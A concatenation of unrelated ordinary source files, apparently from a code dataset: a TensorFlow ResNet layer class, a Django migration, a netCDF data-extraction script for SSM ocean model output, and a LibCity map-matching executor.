return tf.get_variable(name, shape, initializer=init, dtype=self.dtype)
def residual(self, x, shortcut, out_filters, stride, type='B'):
in_shape = shortcut.get_shape()
pad = int(x.get_shape()[3] - in_shape[3])
if pad != 0 or type == 'C':
if type == 'A':
shortcut = tf.strided_slice(shortcut, [0, 0, 0, 0], in_shape,
strides=[1, stride, stride, 1])
shortcut = tf.pad(shortcut, paddings=[[0, 0], [0, 0], [0, 0], [0, pad]])
else:
shortcut = self.conv(shortcut, 1, stride, out_filters)
shortcut = self.norm(shortcut)
x = shortcut + x
x = self.relu(x)
return x
def relu(self, x):
return tf.nn.relu(x)
def conv(self, x, ksize, stride, filters_out, bias=True):
filters_in = x.get_shape()[-1]
wshape = [ksize, ksize, filters_in, filters_out]
w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
weights = self._get_variable('weights', shape=wshape, init=w_init)
x = tf.nn.conv2d(x, weights, [1, stride, stride, 1], padding='SAME')
if bias:
bshape = [filters_out]
b_init = tf.zeros_initializer()
biases = self._get_variable('biases', shape=bshape, init=b_init)
x = x + biases
return x
def norm(self, x, type='BATCH', groups=32, training=False):
if type == 'BATCH':
# Perhaps use tf.nn.fused_batch_norm instead.
x = tf.layers.batch_normalization(x, fused=True, center=True, scale=True,
training=training, trainable=training,
momentum=0.997, epsilon=1e-5)
elif type == 'GROUP':
x = normalization_ops.group_norm(x, groups=groups, center=True, scale=True,
training=training, trainable=training,
channels_axis=-1, reduction_axes=[-3, -2])
return x
def fc(self, x, num_units_out):
num_units_in = x.get_shape()[1]
w_init = contrib.layers.xavier_initializer(dtype=self.dtype)
b_init = tf.constant_initializer(0.0)
with self.namescope('fc'):
weights = self._get_variable('weights', shape=[num_units_in, num_units_out], init=w_init)
biases = self._get_variable('biases', shape=[num_units_out], init=b_init)
x = tf.nn.xw_plus_b(x, weights, biases)
return x
def reduce_mean(self, x, indices=(1, 2)):
x = tf.reduce_mean(x, reduction_indices=indices)
return x
def maxpool(self, x):
x = tf.nn.max_pool(
x,
ksize=[1, 3, 3, 1],
strides=[1, 2, 2, 1],
padding='SAME')
return x
def namescope(self, debug_string):
return tf.variable_scope(debug_string)
| 2.046875 | 2 |
backend/app/migrations/0021_auto_20201205_1846.py | mareknowak98/AuctionPortal | 0 | 4997 | <filename>backend/app/migrations/0021_auto_20201205_1846.py<gh_stars>0
# Generated by Django 3.1.4 on 2020-12-05 18:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0020_auto_20201204_2324'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='profileBankAccountNr',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='profile',
name='profileTelephoneNumber',
field=models.CharField(blank=True, max_length=15, null=True),
),
]
| 1.359375 | 1 |
rawcdf_extract.py | bedaro/ssm-analysis | 0 | 4998 | <reponame>bedaro/ssm-analysis<gh_stars>0
#!/usr/bin/env python3
import time
import os
import tempfile
import shutil
import logging
from enum import Enum
from argparse import ArgumentParser, Namespace, FileType
from netCDF4 import Dataset, MFDataset
import geopandas as gpd
import numpy as np
domain_nodes_shp = "gis/ssm domain nodes.shp"
masked_nodes_txt = "gis/masked nodes.txt"
logger = logging.getLogger(__name__)
def get_node_ids(shps, masked):
merged = None
for i,shp in enumerate(shps):
df = gpd.read_file(shp)
df.set_index('node_id', inplace=True)
logger.debug("Shapefile {0} has {1} nodes".format(shp, len(df)))
if merged is None:
merged = df.index
else:
merged = merged.union(df.index)
logger.debug("get_node_ids found {0} nodes in {1} shapefiles".format(
len(merged), len(shps)))
masked_nodes = np.loadtxt(masked)
merged = merged.difference(masked_nodes)
logger.debug("{0} nodes left after masking".format(len(merged)))
return merged.to_numpy()
DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949,
-0.30326778, -0.40915567, -0.52520996, -0.65060186,
-0.78467834, -0.9269075 ]
def init_output(output_cdf, indata, nodes, **kwargs):
args = Namespace(**kwargs)
output = Dataset(output_cdf, "w")
timeDim = output.createDimension('time', len(indata.dimensions['time']))
nodeDim = output.createDimension('node', len(nodes))
nodeVar = output.createVariable('node', "i4", ('node',))
output['node'][:] = nodes
timeVar = output.createVariable('time', "f4", ('time',))
# Iterate over all output variables
# If an extraction attribute is "all":
# - add the 'siglay' dimension to the output if it's not already present
# - include the 'siglay' dimension on the output variable
# - add a 'zeta' output variable
for var, attr in args.input_vars:
if attr == InputAttr.ALL:
siglayers = indata['siglay'][:] if 'siglay' in indata.variables else DEFAULT_SIGLAYERS
output.createDimension('siglay', len(siglayers))
output.createVariable('siglay', 'f4', ('siglay',))
output['siglay'][:] = siglayers
if 'zeta' in indata.variables:
output.createVariable('zeta', 'f4', ('time','node'))
break
return output
def append_output(output_cdf):
return Dataset(output_cdf, 'a')
def init_output_vars(output, **kwargs):
args = Namespace(**kwargs)
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.BOTTOM:
out_name += "_bottom"
# TODO handle photic case
dims = ('time','siglay','node') if attr == InputAttr.ALL else ('time','node')
output.createVariable(out_name, 'f4', dims)
# Gotten from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i+n]
class InputAttr(Enum):
ALL = 0
BOTTOM = 1
# TODO add "photic" for the photic zone
attr_strings = {
"all": InputAttr.ALL,
"bottom": InputAttr.BOTTOM
}
# Expands an input variable argument into a variable name and an attribute
# describing the vertical extraction method.
def colon_meta(string):
var, attr = string.split(':', 2)
return (var, attr_strings[attr])
def main():
script_home = os.path.dirname(os.path.realpath(__file__))
parser = ArgumentParser(description="Extract data from SSM netcdf output files")
parser.add_argument("incdf", nargs="+", help="each input CDF file")
parser.add_argument("outcdf",
help="the output CDF file (created if it doesn't exist)")
parser.add_argument("outprefix",
help="a prefix for the extracted variables in the output CDF")
parser.add_argument("-d", dest="domain_node_shapefiles", action="append",
help="Specify a domain node shapefile")
parser.add_argument("-m", dest="masked_nodes_file", type=FileType('r'),
help="Specify a different masked nodes text file")
parser.add_argument("--invar", dest="input_vars", type=colon_meta,
action="append",
help="Extract the values of a different output variable")
parser.add_argument("-v", "--verbose", action="store_true", dest="verbose",
help="Print progress messages during the extraction")
parser.add_argument("-c", "--chunk-size", type=int, dest="chunk_size",
help="Process this many CDF files at once")
parser.add_argument("--cache", dest="cache", action="store_true",
help="Use a read/write cache in a temporary directory")
# Cannot include default values of lists here, see
# https://bugs.python.org/issue16399
parser.set_defaults(chunk_size=4, verbose=False,
masked_nodes_file=os.path.join(script_home, masked_nodes_txt))
args = parser.parse_args()
# This is the workaround
if not args.input_vars:
args.input_vars = [("DOXG",InputAttr.BOTTOM)]
if not args.domain_node_shapefiles:
args.domain_node_shapefiles = [os.path.join(script_home, domain_nodes_shp)]
logging.basicConfig(level=logging.INFO if args.verbose else logging.WARNING)
#logger.setLevel(logging.DEBUG)
if args.cache:
with tempfile.TemporaryDirectory() as tmpdir:
exist_cdfs = []
logger.info("Caching input files...")
for infile in args.incdf:
newpath = os.path.join(tmpdir, os.path.basename(infile))
shutil.copy(infile, newpath)
exist_cdfs.append(newpath)
output_cdf = os.path.join(tmpdir, os.path.basename(args.outcdf))
if os.path.exists(args.outcdf):
logger.info("Caching output file...")
shutil.copy(args.outcdf, output_cdf)
do_extract(exist_cdfs, output_cdf, **vars(args))
# Copy the resulting output CDF back
logger.info("Saving output file...")
shutil.copy(output_cdf, args.outcdf)
logger.info("Finished.")
else:
do_extract(args.incdf, args.outcdf, **vars(args))
def do_extract(exist_cdfs, output_cdf, **kwargs):
args = Namespace(**kwargs)
logger.info("Determining scope of work...")
indata = MFDataset(exist_cdfs) if len(exist_cdfs) > 1 else Dataset(exist_cdfs[0])
node_ids = get_node_ids(args.domain_node_shapefiles, args.masked_nodes_file)
logger.info("Initializing output file...")
if not os.path.exists(output_cdf):
outdata = init_output(output_cdf, indata, node_ids, **vars(args))
outdata['time'][:] = indata['time'][:] / 3600 / 24
else:
outdata = append_output(output_cdf)
init_output_vars(outdata, **vars(args))
# Attempts to use the entire MFDataset don't seem to scale well.
# Instead, I'm resorting to a blocking approach where MFDatasets are
# created for only a few netCDF files at a time
indata.close()
i = 0
total = 0
logger.info("Beginning extraction...")
start_time = time.perf_counter()
times_ct = outdata.dimensions['time'].size
for cdfchunk in chunks(exist_cdfs, args.chunk_size):
c = MFDataset(cdfchunk) if len(cdfchunk) > 1 else Dataset(cdfchunk[0])
chunk_times = len(c.dimensions['time'])
data = copy_data(c, outdata, i, node_ids, **vars(args))
i += chunk_times
c.close()
elapsed = (time.perf_counter() - start_time)
to_go = elapsed * (times_ct / i - 1)
total += np.sum([d.size * d.itemsize for k,d in data.items()])
logger.info("{0}/{1} ({2}s elapsed, {3}s to go, {4}KBps)".format(i,
times_ct, int(elapsed), int(to_go), int(total/elapsed/1000)))
logger.info("Extraction finished.")
outdata.close()
def copy_data(cdfin, cdfout, timeidx, node_ids, **kwargs):
args = Namespace(**kwargs)
times_ct = len(cdfin.dimensions['time'])
alldata = {}
# Copy zeta if it's needed
if 'zeta' in cdfout.variables:
alldata['zeta'] = cdfin['zeta'][:, node_ids - 1]
cdfout['zeta'][timeidx:timeidx + times_ct, :] = alldata['zeta']
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.ALL:
slc = slice(None)
elif attr == InputAttr.BOTTOM:
slc = -1
out_name += "_bottom"
# TODO add "photic" case which will look rather different
data = cdfin[var][:, slc, node_ids - 1]
logger.debug("data is shape " + str(data.shape))
if attr == InputAttr.ALL:
cdfout[out_name][timeidx:timeidx+times_ct,:,:] = data
else:
cdfout[out_name][timeidx:timeidx+times_ct,:] = data
alldata[out_name] = data
return alldata
if __name__ == "__main__": main()
| 2.140625 | 2 |
libcity/executor/map_matching_executor.py | nadiaaaaachen/Bigscity-LibCity | 1 | 4999 | <filename>libcity/executor/map_matching_executor.py
from logging import getLogger
from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor
from libcity.utils import get_evaluator
class MapMatchingExecutor(AbstractTraditionExecutor):
def __init__(self, config, model):
self.model = model
self.config = config
self.evaluator = get_evaluator(config)
self.evaluate_res_dir = './libcity/cache/evaluate_cache'
self._logger = getLogger()
def evaluate(self, test_data):
"""
use model to test data
Args:
test_data
"""
result = self.model.run(test_data)
batch = {'route': test_data['route'], 'result': result, 'rd_nwk': test_data['rd_nwk']}
self.evaluator.collect(batch)
self.evaluator.save_result(self.evaluate_res_dir)
def train(self, train_dataloader, eval_dataloader):
"""
对于传统模型,不需要训练
Args:
train_dataloader(torch.Dataloader): Dataloader
eval_dataloader(torch.Dataloader): Dataloader
"""
pass # do nothing
| 2.515625 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.